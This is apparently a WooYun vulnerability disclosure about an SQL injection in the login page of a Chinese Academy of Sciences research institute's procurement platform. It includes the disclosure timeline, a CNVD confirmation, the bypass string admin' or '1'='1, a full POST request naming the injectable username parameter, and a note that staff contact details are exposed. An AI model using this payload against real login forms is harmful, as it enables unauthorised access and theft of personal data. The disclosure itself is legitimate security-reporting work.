乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 细节已通知厂商并且等待厂商处理中 2015-09-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
我一直在思考,有大厂商的世界在哪里
中国科学院上海生科院的采购平台
http://**.**.**.**/pages/login.aspx
用户登录处存在sql注入可以构造账号,输入任意密码,绕过验证进入后台
admin' or '1'='1
注入可以发现数据库中有大量产品和研究所人员信息
http://**.**.**.**/pages/Login.aspxPOST:__VIEWSTATE=%2FwEPDwUJNzk2NDQ4Njc0D2QWAgIBD2QWBgIBD2QWBAIBDw8WAh4EVGV4dAUH5oKo5aW9IWRkAgIPFgIfAAWhFDxkaXYgY2xhc3M9Im5vdGljZSI%2BIDx1bCBpZD0ibm90aWNldWxsaXN0IiBjbGFzcz0ibm90aWNUaXBUeHQiPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTQyMiIgdGFyZ2V0PSJfYmxhbmsiPjxmb250IGNvbG9yPXJlZD7ph4fotK3pg6jorqLotKfns7vnu5%2Fkuqflk4Hmn6Xor6Lor7TmmI7vvIgyMDEz5bm0NuaciOabtOaWsO%2B8iTwvYT48L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTAiIHRhcmdldD0iX2JsYW5rIj7liafmr5Llk4Hop6PnpoHmuIXljZXigJTigJTph4fotK3pg6g8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDQiIHRhcmdldD0iX2JsYW5rIj7ph4fotK3pg6jnu5PnrpfpgJrnn6U8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDEiIHRhcmdldD0iX2JsYW5rIj7ph4fotK3pg6jlnLDlnYDlj5jmm7TpgJrnn6U8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MjEiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMzktTkVCICjmiKrmraLoh7MxMuaciDMx5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUyMCIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszOC1wcm9tZWdhICjmiKrmraLoh7MxMuaciDMx5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxOCIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszNi1FcHBlbmRvcmYgKOaIquatouiHsznmnIgzMOaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTciIHRhcmdldD0iX2JsYW5rIj4yMDE15bm055Sf56eR6Zmi6YeH6LSt6YOo56ys5LiJ5a2j5bqm6ZuG5Lit6YeH6LStLUludml0cm9nZW4o5oiq5q2i6IezOOaciDE05pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxNiIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszNS1HZW5ldGV4ICjmiKrmraLoh7M55pyIMzDml6UpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ik5ld3NEZXRhaWwuYXNweD9OZXdzSUQ9NTE1IiB0YXJnZXQ9Il9ibGFuayI%2BMjAxNOW5tOeUn%2BenkemZoumHh%2Bi0remDqOezu%2BWIl%2BS%2Fg%2BmUgOa0u%2BWKqOS5izM0LUVOWk8gKOaIquatouiHsznmnIgzMOaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTQiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMzMtQWN0aXZlIE1vdGlmKOaIquatouiHsznmnIgzMOaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MTMiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMzItYWJjYW0o5oiq5q2i6IezOeaciDMw5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxMiIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszMi1hYmNhbTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUxMSIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszMS1ORUIo5oiq5q2i6IezN%2BaciDMx5pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUwOSIgdGFyZ2V0PSJfYmxhbmsiPjIwMTXlubTnlJ%2Fnp5HpmaLph4fotK3pg6jkuIrljYrlubTluqbpm4bkuK3ph4fotK0tcWlhZ2VuKOaIquatouiHszXmnIgyMeaXpSk8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDgiIHRhcmdldD0iX2JsYW5rIj4yMDE15bm055Sf56eR6Zmi6YeH6LSt6YOo56ys5LqM5a2j5bqm6ZuG5Lit6YeH6LStLUludml0cm9nZW4o5oiq5q2i6IezNeaciDE05pelKTwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUwNyIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYszMC1taWxsaXBvcmU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iTmV3c0RldGFpbC5hc3B4P05ld3NJRD01MDYiIHRhcmdldD0iX2JsYW5rIj4yMDE05bm055Sf56eR6Zmi6YeH6LSt6YOo57O75YiX5L%2BD6ZSA5rS75Yqo5LmLMjktaW52aXRyb2dlbjwvYT48L2xpPjxsaT48YSBocmVmPSJOZXdzRGV0YWlsLmFzcHg%2FTmV3c0lEPTUwNSIgdGFyZ2V0PSJfYmxhbmsiPjIwMTTlubTnlJ%2Fnp5HpmaLph4fotK3pg6jns7vliJfkv4PplIDmtLvliqjkuYsyOC1iaW8tcmFkKOaIquatouiHszIwMTXlubQ25pyIMzDml6UpPC9hPjwvbGk%2BPC91bD48L2Rpdj5kAgMPDxYCHwAFMuaXoOatpOeUqOaIt%2B%2B8jOivt%2BmHjeaWsOeZu%2BmZhizmiJbogIXlr4bnoIHplJnor68hZGQCDw88KwALAGRkvPLcwW1BkUKd4NxaJZPKhk4rwvY%3D&__EVENTVALIDATION=%2FwEWBQKBzM2kBwLyj%2FOQAgK3jsrkBAKC3IeGDAKGxZ2yD008FUB2VuYlTbDk%2BiWK63W8oW2m&tbUserName=admin&tbPassword=123&btnLogin=%E7%99%BB%E5%BD%95
参数tbUserName
百万产品信息,还有研究所人员姓名邮箱电话办公室等等信息
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-09-21 16:23
CNVD确认所述情况,已经转由CNCERT向中国科学院计算机网络管理中心通报,由其后续协调网站管理单位处置.
暂无